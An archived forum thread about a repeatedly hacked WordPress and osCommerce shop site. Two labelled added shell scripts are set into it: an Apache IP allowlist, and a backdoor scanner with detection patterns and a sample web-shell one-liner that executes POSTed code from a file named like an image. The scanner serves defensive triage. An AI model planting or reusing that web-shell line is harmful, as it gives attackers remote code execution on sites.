Archive for Downsizer For an ethical approach to consumption
 


       Downsizer Forum Index -> IT Matters
sally_in_wales

I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.

My web host helpdesk are pretty good and have helped me unpick it each time it's happened, but no matter how carefully I follow their list of instructions to make sure the password is impossible for me to remember let alone anyone else, and to make sure things like wp are updated regularly, that my home computer is clear of spy stuff and things like that, it seems to happen every few weeks at the moment, and they've just sent me a message saying if it happens again they'll assume it's me being negligent and will suspend the site.

I don't know what else to do to tighten it all up further, and because I have virtually no coding ability I can't spot problem areas within the guts of the system, and I need someone who knows what they are looking at to give the site a good going over looking for malicious loopholes or dodgy permissions or whatever else might be making it easy for them to get in and tighten everything up as far as humanly possible, maybe remove completely anything that isn't necessary to the functionality of the site.

I can pay, I have no idea how big a job it will be, but I'm guessing it's something like an evening's work to do a proper check, tighten anything obvious, then give me a to-do list of anything I need to watch out for or do from there. The main site is run on WP, the shop is oscommerce and really could do with replacing with something more modern, but until I have time to research a new option, I'm stuck with that.

Is anyone able to bail me out here? I've got nasty cold hard cash available.
Treacodactyl

Re: I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.


I don't understand this. Doesn't the company you use lock the account after a few incorrect login attempts, like most other sites?

I would have thought a decent long password of 20 random characters would be fairly secure and could be written down without issue.
Hairyloon

Re: I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.

Are you sure that is what is happening?
You don't need to get inside the system to send emails appearing to come from someone else's domain: you can just change the "from" setting in your email programme.
sally_in_wales

I really don't know, I have something on the wp side of things that flags up if someone has been logged out after trying to get in, but I don't know how it works in the wider system. Is it, for example, possible to lock down the site so that only my ip address can access the guts of things unless I add an ip address to a whitelist, to allow, for example, anyone helping me web wrangle to get in? This is why I need help, I don't know enough about how the various security options work to know if I'm missing out something beyond the most obvious things. I hate not having the skills to do this myself, makes me feel so utterly inept and helpless
sally_in_wales

Re: I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.
Are you sure that is what is happening?
You don't need to get inside the system to send emails appearing to come from someone else's domain: you can just change the "from" setting in your email programme.

The host site keep sending me messages saying they've forced a password reset because they've got verified spamming coming from inside the account, so I assume they are correct. It's usually the first I know about it as they are always madeupnames@myaccount emails, so it's only once in a blue moon that I even see a bounced one coming back via the admin mailserver.
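Sally asked earlier in the thread whether the admin side of the site can be locked to an IP whitelist. The script below is an added example (not code from the thread or from WordPress) showing one way to do that on an Apache host: it writes a `Require ip` allowlist for the `wp-admin/` directory and for `wp-login.php` (which lives in the web root, not under `wp-admin/`). It assumes Apache 2.4 with `AllowOverride` permitting `.htaccess` files, and takes IPv4 addresses or CIDR ranges as arguments; the addresses `203.0.113.5` and `198.51.100.0/24` used in the demo are documentation-range placeholders, not anyone's real address.

```shell
#!/bin/sh
# Added example, not from the thread or from WordPress.
# Writes an Apache 2.4 IP allowlist for the WP admin area.
# Assumptions: Apache 2.4, .htaccess honoured in the web root,
# IPv4 addresses or IPv4/prefix ranges as arguments.

# Accept only dotted-quad IPv4 with an optional /prefix; reject anything
# else so a typo cannot silently open or lock the admin area.
valid_ipv4() {
    case $1 in
        ''|*[!0-9./]*|*..*|.*|*.|*/*/*) return 1 ;;
    esac
    ip=${1%%/*}
    prefix=${1#*/}
    [ "$prefix" = "$1" ] && prefix=32
    [ -n "$prefix" ] || return 1
    set -- $(printf '%s\n' "$ip" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ "$o" -le 255 ] || return 1
    done
    [ "$prefix" -le 32 ]
}

# write_admin_allowlist WEBROOT IP [IP...]
# Creates WEBROOT/wp-admin/.htaccess and appends a <Files> block for
# wp-login.php to WEBROOT/.htaccess.
write_admin_allowlist() {
    webroot=$1; shift
    [ $# -ge 1 ] || { echo "need at least one IP" >&2; return 1; }
    for a in "$@"; do
        valid_ipv4 "$a" || { echo "bad address: $a" >&2; return 1; }
    done
    ips=$*
    # admin-ajax.php is requested by the public front end (themes and
    # plugins), so it stays open; everything else under wp-admin/ is
    # limited to the allowlist.
    {
        printf '<FilesMatch "admin-ajax\\.php">\n  Require all granted\n</FilesMatch>\n'
        printf 'Require ip %s\n' "$ips"
    } > "$webroot/wp-admin/.htaccess"
    printf '<Files "wp-login.php">\n  Require ip %s\n</Files>\n' "$ips" >> "$webroot/.htaccess"
}

# Stand-alone run against a constructed, throwaway web root.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/wp-admin"
write_admin_allowlist "$demo_root" 203.0.113.5 198.51.100.0/24
cat "$demo_root/wp-admin/.htaccess" "$demo_root/.htaccess"
rm -rf "$demo_root"
```

Two caveats a practitioner would add: a home broadband address usually changes, so allow the whole range your ISP uses (or a VPN/static address) rather than a single IP, or you will lock yourself out; and this only closes the login path. If a backdoor file has already been planted elsewhere in the web root, it is reachable without going through `wp-admin/` at all, so the allowlist complements a file-level clean-up rather than replacing it.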
vegplot

Wordpress has had a string of nasty vulnerabilities recently. I don't mind having a look at it the evening to see if there's anything I can do. DM me if you'd like me to take a look. I'll need your login details.
Nick

Wordpress has had a string of nasty vulnerabilities recently. I don't mind having a look at it the evening to see if there's anything I can do. DM me if you'd like me to take a look. I'll need your login details.

And mother's maiden name, PIN number, and name of your first pet.
sally_in_wales

thank you!
Snowball

Jema is also looking.
sally_in_wales

much appreciated. Vegplot has some excellent ideas to help muck out the lingering mess from years of me muddling through, so hopefully all curable Cool
jema

I seriously doubt that this is anything to do with passwords.

Both WP and oscommerce have poor reputations, but if you are updating and have not got a lot of add-ons and are still being attacked regularly, then I strongly suspect that when the first attack happened a backdoor file was planted on the system, allowing anyone in whenever they like.

Someone needs to look for files updated since the site was first created, and go through all the php and other vulnerable extensions looking for a nasty; usually these start off with something that decrypts itself.

This needs to be done from a shell session, does your provider allow you login access to a command line?
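The triage jema describes above (files changed since the site went live, PHP that decodes and executes itself, run from a shell) can be scripted. The block below is an added example, not code from the thread or from WordPress/osCommerce. It assumes POSIX sh with `find` and `grep -E`, takes the web root as a parameter, and builds a constructed throwaway web root so it runs offline; the pattern list is a deliberately broad starting point, not a complete signature set.

```shell
#!/bin/sh
# Added example, not from the thread or from WordPress/osCommerce.
# Shell triage of a shared-hosting web root for a planted PHP backdoor:
#   1. files modified recently,
#   2. PHP-like files carrying self-decoding / eval markers,
#   3. PHP where only media or cache files should live.
# Assumptions: POSIX sh, find, grep -E, mktemp; web root given as $1.

# 1. Files modified within the last N days (default 30). On a site that is
#    only changed through the WP dashboard, anything in this list outside
#    the core/plugin/theme directories deserves a look.
recent_files() {
    webroot=$1
    days=${2:-30}
    find "$webroot" -type f -mtime "-$days" -print
}

# 2. Markers typical of obfuscated droppers. This list is constructed for
#    the example and will also hit some legitimate code (WP core and plugins
#    do call base64_decode), so review hits, do not delete on sight.
SUSPECT_RE='eval\(|base64_decode\(|gzinflate\(|gzuncompress\(|str_rot13\(|preg_replace\(.*/e|assert\(|\$_(GET|POST|REQUEST|COOKIE)\[[^]]*\][[:space:]]*\('

# '*.php.*' is included because older mod_php setups execute any file with
# ".php" anywhere in the name, e.g. logo.php.jpg.
suspicious_php() {
    webroot=$1
    find "$webroot" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \
            -o -name '*.inc' -o -name '*.php.*' \) \
        -exec grep -lE "$SUSPECT_RE" {} + || :   # grep exits 1 for a batch with no hits
}

# 3. Executable PHP inside directories that should only hold uploads/images/cache.
php_in_upload_dirs() {
    webroot=$1
    find "$webroot" -type f \( -path '*/uploads/*' -o -path '*/images/*' -o -path '*/cache/*' \) \
        -name '*.php*' -print
}

# Constructed sample web root so the script runs offline. The "backdoor"
# files only mimic the usual one-liner shape; they are not real samples.
make_sample_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads/2014/05" "$d/catalog/includes"
    printf '<?php echo "clean page"; ?>\n' > "$d/index.php"
    printf '<?php include "includes/application_top.php"; ?>\n' > "$d/catalog/index.php"
    # disguised as an image, decodes and runs whatever is POSTed to it
    printf '<?php @eval(base64_decode($_POST["c"])); ?>\n' > "$d/wp-content/uploads/2014/05/logo.php.jpg"
    # hidden dotfile in the shop's include dir, classic self-decoding dropper
    printf '<?php $x=gzinflate(base64_decode("H4sI"));eval($x); ?>\n' > "$d/catalog/includes/.config.inc"
    printf '%s\n' "$d"
}

scan_webroot() {
    webroot=$1
    days=${2:-30}
    echo "== files changed in the last $days days =="
    recent_files "$webroot" "$days"
    echo "== PHP with eval/decode markers =="
    suspicious_php "$webroot"
    echo "== PHP hiding in upload/image/cache directories =="
    php_in_upload_dirs "$webroot"
}

# Stand-alone run against the constructed sample.
sample=$(make_sample_webroot)
scan_webroot "$sample" 1
rm -rf "$sample"
```

On a real site, run `scan_webroot /path/to/webroot 90` over SSH, then compare any flagged file against a freshly downloaded copy of the same WordPress or osCommerce version (`diff` against the pristine file) before deciding it is malicious. Once the web root is clean, change every credential the attacker could have read from it (database password in `wp-config.php` and the osCommerce configure files, FTP/SFTP, and the mail account used for sending), otherwise the next "attack" is just the old keys being reused.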
sally_in_wales



This needs to be done from a shell session, does your provider allow you login access to a command line?

err, I don't quite know what that means, but I expect Vegplot will and I'll see if I can find out. The current plan if I've understood it correctly is to move the good bits of the site out for a while so we can scrap everything else (there are bits of files in there left over from the old Geocities days I suspect, I've always been too afraid to delete old versions in case I scrap something important Embarassed ) then put the usable bits back in a tidy way.

I do need to find a new shop option, the oscommerce one has been aging rapidly for ages now, I've tried to look up reviews of different options but they all assume one speaks a certain techie language and I get utterly boggled by the bits about installation requirements before I get to the parts about whether I can get it to do the things I need, like postage based on weight and region rather than the flat rate only that a lot of the online shop options seem to stick with.

I know it's pathetic that I can't manage all this tidily in this day and age, everyone else on the planet seems to be able to converse about php and coding stuff without needing to lie down in a darkened room with a nice flint axe for comfort, but I'm failing badly at keeping up here
Nick

Your mistake is probably trying to do it. There are some things one can do, and some one cannot. It's not a bad thing to pay an expert to do something expert. Your website is a crucial tool for the business, and worth getting right. There's no point in feeling bad, or guilty about it. Fwiw, vegplot and jema are probably awful at medieval cosmetic formulation. Smile
sally_in_wales

that makes me feel a bit better Very Happy
earthyvirgo



This needs to be done from a shell session, does your provider allow you login access to a command line?

err, I don't quite know what that means, but I expect Vegplot will and I'll see if I can find out. The current plan if I've understood it correctly is to move the good bits of the site out for a while so we can scrap everything else (there are bits of files in there left over from the old Geocities days I suspect, I've always been too afraid to delete old versions in case I scrap something important Embarassed ) then put the usable bits back in a tidy way.

I do need to find a new shop option, the oscommerce one has been aging rapidly for ages now, I've tried to look up reviews of different options but they all assume one speaks a certain techie language and I get utterly boggled by the bits about installation requirements before I get to the parts about whether I can get it to do the things I need, like postage based on weight and region rather than the flat rate only that a lot of the online shop options seem to stick with.

I know it's pathetic that I can't manage all this tidily in this day and age, everyone else on the planet seems to be able to converse about php and coding stuff without needing to lie down in a darkened room with a nice flint axe for comfort, but I'm failing badly at keeping up here

It's not pathetic at all Sally. I'm an ex-web designer, I've started describing my own website as 'vintage' and 'retro', it's so in need of an overhaul.

People still buy from it tho', so it's functional, if not a thing of great beauty.

EV
vegplot

Fwiw, vegplot and jema are probably awful at medieval cosmetic formulation. Smile

Mud. It's quite simple.
Nick

Fwiw, vegplot and jema are probably awful at medieval cosmetic formulation. Smile

Mud. It's quite simple.

I stand corrected. Fix your own website.